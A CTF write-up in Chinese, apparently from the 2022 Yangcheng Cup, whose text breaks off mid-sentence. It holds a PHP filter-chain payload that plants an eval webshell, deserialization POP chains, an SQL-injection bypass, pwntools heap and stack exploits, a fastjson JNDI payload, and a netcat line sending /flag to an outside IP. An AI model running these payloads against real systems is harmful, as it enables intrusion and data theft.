rce_me
老考点了,$_SERVER["QUERY_STRING"]不会对获取的内容进行URL解码,因此只要URL编码一下就完事了
image-20220903131902165- 用伪协议直接RCE写shell
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR
|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-d
ecode/resource=index.php&0=%65%63%68%6f%20%27%3c%3f%3d%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3f%3e%27%3e%32%2e%74%78%74
- SUID提权
step_by_step-v3
简单的POP链寻找EXP
<?php
// Challenge source as reproduced by the writeup. Reporting is switched off,
// so notices/warnings raised by the code below (e.g. a failed include) are
// not reported.
error_reporting(0);
/**
 * Gadget 1 of the chain: converting this object to a string calls whatever
 * `$y1` holds.
 */
class yang
{
    public $y1;

    /** Invoked when the object is used as a string: calls `$y1` as a
     *  callable with no arguments (a string such as "phpinfo" names a
     *  function). */
    public function __tostring()
    {
        ($this->y1)();
    }

    /**
     * Includes hint.php (presumably where `$hey_mean_then` is defined — it
     * is not assigned anywhere in this file) and then includes the
     * request-supplied `file` parameter unless it matches that regex.
     *
     * Review note: this is a denylist in front of include_once() on a
     * request-controlled path; whether it blocks stream wrappers depends on
     * hint.php, which is not shown. The control that holds regardless of the
     * regex is an allow-list of includable files (or a fixed directory plus
     * basename()).
     */
    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            // "/$hey_mean_then/is": case-insensitive, and '.' matches newline.
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
/**
 * Gadget 2: the unserialize() entry point (__wakeup) and a callable gadget
 * (__invoke).
 */
class cheng
{
    public $c1;

    /** Runs on unserialize(): writes `flag` on `$c1`. When `$c1` is a `bei`,
     *  which declares no `flag` property, the write goes through
     *  bei::__set(). */
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }

    /** Runs when the object is called as a function: calls `$c1->hint()`.
     *  On a `yang` that is a real method; on a `bei` it goes to __call(). */
    public function __invoke()
    {
        $this->c1->hint();
    }
}
/**
 * Gadget 3: both magic methods output `$b1`, which forces string conversion
 * of it (yang::__tostring when `$b1` is a yang).
 */
class bei
{
    public $b1;
    public $b2;

    /** Called for writes to undeclared properties; both arguments are
     *  ignored. */
    public function __set($k1,$k2)
    {
        print $this->b1;
    }

    /** Called for undefined methods; both arguments are ignored. */
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
// Object graph that is serialized as the payload:
// cheng -> bei -> yang -> cheng -> bei -> yang -> "phpinfo".
// Each hop is one of the magic-method transitions of the classes above
// (__wakeup -> __set -> __tostring -> __invoke -> __call -> __tostring).
$o = new cheng;
$o->c1= new bei();
$o->c1->b1 = new yang;
$o->c1->b1->y1= new cheng;
$o->c1->b1->y1->c1 = new bei;
$o->c1->b1->y1->c1->b1=new yang;
$o->c1->b1->y1->c1->b1->y1="phpinfo";
echo serialize($o);
?>
在phpinfo中找到flag
image-20220903102650757ComeAndLogin
SQL 注入只要将username中的单引号直接转义,password中把单引号直接注释,拼接一个or 1,空格用tab键代替即可。
image-20220904025203043登陆后存在源码:
<?php
// Post-login page reproduced by the writeup. It prints its own source via
// highlight_file(), so any edit to this file also changes the page output.
session_start();
// Strict comparison: only the boolean true passes, not 1 or "1".
if($_SESSION["admin"] !== True){
    die("You are not admin");
}else{
    highlight_file(__FILE__);
    // No earlier assignment of $path is visible, so this branch always runs
    // and $path comes straight from the POST body.
    if(!isset($path)){
        $path = $_POST['path'];
        // Denylist: fewer than three '/', any '.', or a '//' is rejected.
        // Nothing here confines the read to a directory; a realpath() check
        // against an allow-listed base directory would.
        if ((substr_count($path,'/') < 3)or(substr_count($path,'.') > 0) or (preg_match("/\/\//",$path)) ){
            die("invaild path");
        }
        echo file_get_contents($path);
    }
}
代码审计发现,`/` 要超过三个,不能含有 `.`,不能有 `//`,直接用 2020 WMCTF 中的软链接套娃技巧读取 flag。
Safepop
原题:https://bbs.pediy.com/thread-271714.htm
<?php
/**
 * Holds a callable-array pointing at Test::getFlag (excerpt of the
 * challenge source; only the members the chain depends on are shown).
 */
class Fun{
    private $func;

    public function __construct()
    {
        $target = new Test();
        $this->func = [$target, 'getFlag'];
    }
}
/** Target of Fun::$func; getFlag() does nothing in this excerpt. */
class Test{
    public function getFlag()
    {
        return;
    }
}
/** Middle wrapper: `$a` carries the Fun instance. */
class A{
    public $a = null;
}
/** Outer wrapper; declares `$p` (note the chain below writes `->a`). */
class B{
    public $p = null;
}
// Builds B -> A -> Fun and serializes it. Note `$Class_B->a`: B declares
// `$p`, not `$a`, so this creates a dynamic property (deprecated as of
// PHP 8.2); possibly `->p` was intended — confirm against the challenge's
// unserialize path. The str_replace then changes Fun's serialized property
// count from 1 (its single declared property) to 2, so the string no longer
// matches the class definition.
$Class_A = new A;
$Class_B = new B;
$Class_A->a = new Fun;
$Class_B->a = $Class_A;
$payload= serialize($Class_B);
$payload = str_replace('"Fun":1:','"Fun":2:',$payload);
echo urlencode($payload);
MISC1
维吉尼亚解密得到压缩包密码:
Hello friends, I am the President of Ukraine Zelensky. The Russian army has just launched an attack on Ukraine, and the Kyiv airport has been controlled by the Russian army. Heard today is KFC Crazy Thursday, I need someone to bring me 29.94 finger-sucking original chicken as rations now. When I repel the Russian army, I will invite you to come to Ukraine to be the vice president.the password is GWHT@R1nd0yyds
解压得到:
out用hint中的脚本编写解码脚本:
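from PIL import Image

# Decodes the text hidden in out.bmp (the hint script reworked): one character
# per pixel, row by row, rebuilt from pixel channels 1 and 2 as (hi << 8) + lo.
# NOTE(review): assumes getpixel() returns a tuple (RGB/RGBA); on a palette or
# grayscale image it returns an int and the indexing below fails.


def decode_pixels(pic):
    """Return the string encoded in `pic`.

    `pic` only needs `.size` -> (width, height) and `.getpixel((x, y))`.
    Characters are joined once at the end instead of growing a string in
    the loop.
    """
    width, height = pic.size
    chars = []
    for y in range(height):
        for x in range(width):
            pix = pic.getpixel((x, y))
            chars.append(chr((pix[1] << 8) + pix[2]))
    return ''.join(chars)


# `with` releases the file handle; the original never closed it.
with Image.open("./out.bmp", "r") as pic:
    flag = decode_pixels(pic)
print(flag)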
- flag在文章里面
flag{h1d3_1n_th3_p1ctur3}
MISC2
取证大师直接恢复所有文件
image-20220903233947975发现其中45.png文件损坏,缺少一个png头,加上即可,发现45.png与其他图片文件的MD5不一样,直接进行文件比较发现如下提示:
image-20220903234046087- 发现将这个当做可爱可莉.jpg的outguess密码来跑一下出现flag
- flag
- image-20220903234156786
ycb pwn wp
pwn
YCBSQL
没有ban掉.shell和.system,可以直接执行命令,然后cat /flag把内容反弹给服务器即可。
.shell cat /flag | nc 123.123.123.123 9999
fakeNoOutput
32位栈溢出
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
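binary = './fakeNoOutput'
# Make the local copy executable without passing the path through a shell
# (list form, no string interpolation; the original used os.system with %).
import subprocess
subprocess.call(['chmod', '+x', binary])
context.update(os='linux', arch='i386', timeout=1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
# The original assigned elf.libc here and overwrote it on the next line; the
# explicit ./libc.so.6 is what the remote path uses (DEBUG keeps elf.libc).
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '28103'
    p = remote(host, port)
# Tube helpers. l64/l32 receive up to a marker byte and unpack the preceding
# bytes as an address; uu64/uu32 unpack a fixed number of received bytes;
# rint parses received hex text. All of them log through ras().
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands; sla/sa/ru coerce their prompt argument with str().
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))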
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call
    can be wrapped around a receive expression."""
    lg('leak' , data)
    return data
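def dbg(b=None):
    """Attach gdb to the current tube `p`.

    Without an argument: attach and pause so the debugger can be driven by
    hand. With `b`: attach and set a breakpoint at that location.
    NOTE(review): the original default was `null`, which is not a Python
    builtin — unless the star-import above supplies it, defining the function
    raises NameError; `None` is the intended sentinel, compared with `is`.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)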
def cmd(num):
    """Answer the next ':' prompt with `num` (menu selection helper)."""
    sla(':',num)
def attack():
    """Exploit driver for the fakeNoOutput challenge described in the writeup
    text above (32-bit stack overflow).

    NOTE(review): Python 2 only — str payloads are concatenated with the
    output of flat() and `.next()` is called on the search generator; under
    Python 3 these raise before anything is sent. main_addr, send_addr and the
    0x1044 padding are specific to this binary.
    """
    head = 'head /upload HTTP/1.1\n'
    head += 'HTTP_SERVER1_token: 114514\n'
    head += 'User-Agent: 114514\n'
    head += 'Cookie: 114514\n'
    head += 'Referer: 114514\n'
    head += 'Content-Length: 5000\n'
    sl(head)
    payload = 'Content:filename=114514'
    sl(payload)
    # raw_input()
    fprintf_got = elf.got['fprintf']
    main_addr = 0x8049F77
    send_addr = 0x080496A1
    payload = 'a'*0x1044
    payload += flat(send_addr , main_addr , fprintf_got)
    payload = payload.ljust(5000 -25 ,'\x01')
    # dbg('*0x8049B05')
    sl(payload)
    libc.address = l32() - libc.sym['fprintf']
    binsh_addr = libc.search('/bin/sh\x00').next()
    system_addr = libc.sym['system']
    rop = ROP(libc)
    rop.system(binsh_addr,0,0)
    sl(head)
    payload = 'Content:filename=114514'
    sl(payload)
    payload = 'a'*0x1044
    payload += flat(system_addr,system_addr,binsh_addr)
    payload = payload.ljust(5000 -25 ,'\x01')
    # dbg('*0x8049B05')
    sl(payload)
    p.interactive()
attack()
'''
@File : fakeNoOutput.py
@Time : 2022/09/03 11:01:49
@Author : Niyah
'''
ez_linklist
unlink操作没有置空next,可以造成uaf
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
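binary = './ez_linklist'
# Make the local copy executable without passing the path through a shell
# (list form, no string interpolation; the original used os.system with %).
import subprocess
subprocess.call(['chmod', '+x', binary])
context.update(os='linux', arch='amd64', timeout=1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
# The original assigned elf.libc here and overwrote it on the next line; the
# explicit ./libc.so.6 is what the remote path uses (DEBUG keeps elf.libc).
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm','-g','1234', binary])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '25325'
    p = remote(host, port)
# Tube helpers. l64/l32 receive up to a marker byte and unpack the preceding
# bytes as an address; uu64/uu32 unpack a fixed number of received bytes;
# rint parses received hex text. All of them log through ras().
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands; sla/sa/ru coerce their prompt argument with str().
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))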
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call
    can be wrapped around a receive expression."""
    lg('leak' , data)
    return data
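def dbg(b=None):
    """Attach gdb to the current tube `p`.

    Without an argument: attach and pause so the debugger can be driven by
    hand. With `b`: attach and set a breakpoint at that location.
    NOTE(review): the original default was `null`, which is not a Python
    builtin — unless the star-import above supplies it, defining the function
    raises NameError; `None` is the intended sentinel, compared with `is`.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)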
def cmd(num):
    """Answer the next 'choice:' prompt with `num` (menu selection helper)."""
    sla('choice:',num)
def add(size , text = flat(0 , 0x431)):
    """Menu option 1: allocate a node of `size` bytes, then send `text` as its
    content (the default is evaluated once, at definition time)."""
    cmd(1)
    answers = (('Size:', size),)
    for prompt, value in answers:
        sla(prompt, value)
    sa('Content:', text)
def link(idx , idx2):
    """Menu option 3: link node `idx` to node `idx2`."""
    cmd(3)
    answers = (('from:', idx), ('to:', idx2))
    for prompt, value in answers:
        sla(prompt, value)
def unlink(idx ,offset):
    """Menu option 4: unlink at node `idx`, position `offset`."""
    cmd(4)
    answers = (('Index:', idx), ('offset:', offset))
    for prompt, value in answers:
        sla(prompt, value)
def delete(idx ,offset):
    """Menu option 2: delete at node `idx`, position `offset`.

    Note the prompts here are 'Index' / 'offset' without a colon, unlike
    unlink(); they are matched as substrings by sendlineafter().
    """
    cmd(2)
    answers = (('Index', idx), ('offset', offset))
    for prompt, value in answers:
        sla(prompt, value)
def attack():
    """Exploit driver for the ez_linklist challenge (the writeup text above
    names the bug: unlink does not clear the next pointer).

    NOTE(review): Python 2 only — str payloads such as '/bin/sh\\x00' are
    passed to flat() alongside ints and `.next()` is called on the search
    generator; under Python 3 these raise. The 0x3e0 / 0x490 / 0x70 constants
    are layout offsets specific to this binary and libc build.
    """
    add(0x70 )
    add(0x70)
    link(0 , 1)
    unlink(0,0)
    delete(1 , 0xff)
    add(0x70)
    add(0x70)
    add(0x70)
    add(0x70)
    for i in range(0x9):
        add(0x70)
    link(4,5)
    add(0x70)
    link(2,1)
    link(2,3)
    delete(2,2)
    delete(2,1)
    link(0,2)
    cmd(4)
    sla('Index:' , 0)
    ru('Offset 0:' )
    heap_base = uu64(6) - 0x3e0
    sla('offset:' , 0)
    add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
    delete(1,0)
    add(0x70)
    delete(2,0)
    add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
    link(0,5)
    cmd(4)
    sla('Index:' , 0)
    ru('Offset 0:' )
    __malloc_hook = l64() - 0x70
    sla('offset:' , 0)
    libc.address = __malloc_hook - libc.sym['__malloc_hook']
    system_addr = libc.sym['system']
    __free_hook = libc.sym['__free_hook']
    binsh_addr = libc.search('/bin/sh').next()
    lg('__free_hook',__free_hook)
    delete(4 , 1)
    add(0x30)
    add(0x60 , flat(__free_hook-8 ,0)*6)
    add(0x70 )
    add(0x70 , flat('/bin/sh\x00', system_addr))
    delete(8,0)
    # dbg()
    p.interactive()
attack()
'''
@File : ez_linklist.py
@Time : 2022/09/03 09:30:32
@Author : Niyah
'''
dream
先解一下xxtea,随后largebinattack打stderr house of apple即可
# -*- encoding: utf-8 -*-
from ctypes import *
import sys
import os
import requests
from pwn import *
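binary = './dream'
# Make the local copy executable without passing the path through a shell
# (list form, no string interpolation; the original used os.system with %).
import subprocess
subprocess.call(['chmod', '+x', binary])
context.update(os='linux', arch='amd64', timeout=1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
# libc is resolved from the binary; the explicit ELF('') line is left disabled.
libc = elf.libc
# libc = ELF('')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '24495'
    p = remote(host, port)
# Tube helpers. l64/l32 receive up to a marker byte and unpack the preceding
# bytes as an address; uu64/uu32 unpack a fixed number of received bytes;
# rint parses received hex text. All of them log through ras().
l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))
l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'\x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'\x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands; sla/sa/ru coerce their prompt argument with str().
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))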
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call
    can be wrapped around a receive expression."""
    lg('leak' , data)
    return data
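def dbg(b=None):
    """Attach gdb to the current tube `p`.

    Without an argument: attach and pause so the debugger can be driven by
    hand. With `b`: attach and set a breakpoint at that location.
    NOTE(review): the original default was `null`, which is not a Python
    builtin — unless one of the star-imports above supplies it, defining the
    function raises NameError; `None` is the intended sentinel, compared
    with `is`.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)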
def cmd(num):
    """Answer the next 'choice:' prompt with `num` (menu selection helper)."""
    sla('choice:',num)
def add(id , size , text = 'a'):
    """Menu option 1: create entry `id` with `size` bytes, then send `text`
    at the 'dream:' prompt (default content is the single byte 'a')."""
    cmd(1)
    answers = (('ID:', id), ('long:', size))
    for prompt, value in answers:
        sla(prompt, value)
    sa('dream:', text)
def edit(idx , text):
    """Menu option 3: overwrite entry `idx` with `text`."""
    option = 3
    cmd(option)
    sla('make?', idx)
    sa('dream:', text)
def show(idx ):
    """Menu option 4: print entry `idx`."""
    option = 4
    cmd(option)
    sla('show?', idx)
def delete(idx ):
    """Menu option 2: free entry `idx`."""
    option = 2
    cmd(option)
    sla('wake?', idx)
def MX(z, y, total, key, p, e):
    """Mixing term of the challenge's XXTEA variant; returns a c_uint32.

    `z`, `y`, `total`, `e` are c_uint32 operands, `key` a 4-word list, `p`
    the word index. Shifts bind tighter than ^ in Python, so the grouping
    is ((z>>7) ^ (y<<3)) + ((y>>3) ^ (z<<4)) — note the 7/3 pair differs
    from the textbook XXTEA MX (5/2). The intermediate sums are plain ints
    and only the final xor is truncated to 32 bits.
    """
    zv, yv = z.value, y.value
    left = ((zv >> 7) ^ (yv << 3)) + ((yv >> 3) ^ (zv << 4))
    key_word = key[(p & 3) ^ e.value]
    right = (total.value ^ yv) + (key_word ^ zv)
    return c_uint32(left ^ right)
def decrypt(n, v):
    """Inverse of the challenge's XXTEA variant over `n` 32-bit words.

    `v` is a list of `n` ints; it is modified in place and also returned.
    The key is the fixed [9, 5, 2, 7]; all arithmetic wraps through c_uint32.
    `n` must be a positive int (it is used in a floor division and a range).
    """
    key = [9, 5, 2, 7]
    delta = 0x9e3779b9
    rounds = 6 + 52 // n
    total = c_uint32(rounds * delta)
    y = c_uint32(v[0])
    e = c_uint32(0)
    for _ in range(rounds):
        e.value = (total.value >> 2) & 3
        # Walk the block backwards; each word is undone using its predecessor.
        for p in reversed(range(1, n)):
            z = c_uint32(v[p - 1])
            v[p] = c_uint32(v[p] - MX(z, y, total, key, p, e).value).value
            y.value = v[p]
        # Word 0 wraps around to the last word of the block.
        z = c_uint32(v[n - 1])
        v[0] = c_uint32(v[0] - MX(z, y, total, key, 0, e).value).value
        y.value = v[0]
        total.value -= delta
    return v
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _flags2 = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    """Serialize a 0xd8-byte FILE-struct image from the given field values.

    Fields are laid out in declaration order; `_lock`, `_wide_data` and
    `_mode` are placed at fixed offsets 0x88, 0xa0 and 0xc0 by zero-padding,
    and the result is padded to 0xd8. Python 2 only: the pads are str
    literals concatenated with the output of p32()/p64().
    """
    file_struct = p32(_flags) + \
        p32(0) + \
        p64(_IO_read_ptr) + \
        p64(_IO_read_end) + \
        p64(_IO_read_base) + \
        p64(_IO_write_base) + \
        p64(_IO_write_ptr) + \
        p64(_IO_write_end) + \
        p64(_IO_buf_base) + \
        p64(_IO_buf_end) + \
        p64(_IO_save_base) + \
        p64(_IO_backup_base) + \
        p64(_IO_save_end) + \
        p64(_IO_marker) + \
        p64(_IO_chain) + \
        p32(_fileno) + \
        p32(_flags2)
    # Zero-fill up to each fixed-offset field.
    file_struct = file_struct.ljust(0x88, '\x00')
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, '\x00')
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, '\x00')
    return file_struct
def attack():
    """Exploit driver for the dream challenge (the writeup text above: xxtea
    decode of the leaked data, then the heap/stdio technique it names).

    NOTE(review): Python 2 only — `0x420/4` is a float under Python 3 and
    breaks range()/decrypt(), str pads are concatenated with p64() output,
    and `.next()` is called on search generators. The 0x1e6680 lock offset
    and the heap deltas are specific to this libc build.
    """
    add(0 ,0x420 , 'aaaaaaaa')
    add(1 ,0x400 , 'aaaaaaaa')
    add(2 ,0x410 , 'aaaaaaaa')
    add(3 ,0x400 )
    delete(0)
    add(4 , 0x430 )
    delete(2)
    show(0)
    # dbg()
    data = []
    for i in range(0x420/4):
        data.append(uu32())
    # NOTE(review): unlike the other dbg() calls in this function this one is
    # live — it attaches gdb and blocks until resumed; presumably a leftover
    # from debugging.
    dbg()
    res = decrypt(0x420/4 , data)
    print(res)
    leak = ( res[1] << 32 ) + res[0]
    heap_addr = ( res[5] << 32 ) + res[4]
    __malloc_hook = leak - 0x60 - 0x400
    libc.address = __malloc_hook - libc.sym['__malloc_hook']
    libc_base = libc.address
    __free_hook = libc.sym['__free_hook']
    lg('__free_hook',__free_hook)
    lg('heap_addr',heap_addr)
    lg('addr',leak)
    stderr = libc.sym['stderr']
    edit(0 , flat(leak , leak , heap_addr ,stderr - 0x20))
    add(5 ,0x4ff)
    delete(5)
    add(6 , 0x450)
    _IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
    _lock = libc_base + 0x1e6680
    syscall = libc.sym['alarm'] + 5
    setcontext = libc.sym['setcontext']
    pop_rax_ret = libc.search(asm('pop rax; ret')).next()
    pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
    pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
    pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
    ret = pop_rdi_ret + 1
    fake_io_addr = heap_addr + 0x840
    flag_addr = fake_io_addr + 0x300 + 0x10
    file = pack_file(
        _flags = 0,
        _lock = _lock,
        _IO_write_ptr = 0xa81, # 0xb81
        _wide_data = fake_io_addr + 0xe0 ,
    ) + p64(_IO_wfile_jumps)
    rop = ROP(libc)
    rop.open(flag_addr , 0,0)
    rop.read(3 , flag_addr , 0x40)
    rop.write(1 , flag_addr , 0x40)
    payload = p64(fake_io_addr + 0xe8)+'\x00'*0x98
    payload += flat(fake_io_addr + 0xe0*2+0x10 , ret )
    payload += '\x00'*0x30
    payload += p64(fake_io_addr + 0xe0*2-0x68+8)
    payload += p64(setcontext+61)
    payload += rop.chain()
    payload = file[0x10:] + payload
    payload = payload.ljust( 0x300,'\x00')+ 'flag\x00'
    edit(2 , payload)
    edit(5 , flat(0 , 0x100)*0x49)
    # cmd(5)
    cmd(1)
    sla('ID:' , 7)
    # dbg('_IO_wfile_overflow')
    sla('long:' , 0x4ff)
    # dbg()
    # p.success(getShell())
    p.interactive()
attack()
'''
@File : dream.py
@Time : 2022/09/03 17:28:55
@Author : Niyah
'''
simple_json
根据题目信息猜测打fastjson,pom显示fastjson版本是1.2.83,源码里有个Message类和JNDIService类搭配可触发jndi,并且出题人的Test.class忘记删除,题目反序列化的点在于/ApiTest/post,经过验证确认可用。
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://xxx:port/xxx"}, "msg":{"$ref":"$.content.context"}}
看了一下没什么依赖,常规的加载远程恶意类的方式打不通,jar包本地用的低版本的jdk启动后发现可以打通,确定了是jdk版本问题,远程应该是一个高版本的jdk。
Jndi绕过高版本jdk的方式有很多:https://tttang.com/archive/1405/
一一比较后能够发现有两个类可用:
org.apache.catalina.users.MemoryUserDatabaseFactory\org.yaml.snakeyaml.Yaml
前者可用来打xxe,在一定情况下也可以RCE:
